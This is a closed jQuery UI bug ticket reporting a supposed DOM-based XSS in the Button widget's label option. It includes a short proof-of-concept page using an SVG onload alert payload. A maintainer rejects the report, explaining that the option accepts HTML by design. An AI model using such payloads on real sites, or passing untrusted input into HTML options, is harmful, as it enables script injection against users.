Skip to main content

Search and Top Navigation

#15201 closed bug (notabug)

Opened June 06, 2017 01:18PM UTC

Closed June 06, 2017 01:26PM UTC

Last modified June 06, 2017 01:49PM UTC

Button widget, label attribute DOM based XSS

Reported by: psych0tr1a Owned by:
Priority: minor Milestone: none
Component: ui.button Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:
Description

Proof of concept:

<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>

<button>Button label</button>

<script>
$( "button" ).button({
  label: "<svg/onload=alert(1)>"
});
</script>
Attachments (0)
Change History (5)

Changed June 06, 2017 01:26PM UTC by scottgonzalez comment:1

resolution: → notabug
status: newclosed

That's not XSS. That's you explicitly inserting a script.

Changed June 06, 2017 01:28PM UTC by psych0tr1a comment:2

Sorry but you are absolutely wrong. Functionality means that there will be inserted text ane html, if the developers will use this functionality and there will be a user input then this is XSS.

Changed June 06, 2017 01:29PM UTC by psych0tr1a comment:3

Changed June 06, 2017 01:32PM UTC by psych0tr1a comment:4

Changed June 06, 2017 01:49PM UTC by scottgonzalez comment:5

Those are both text options, this is an HTML option.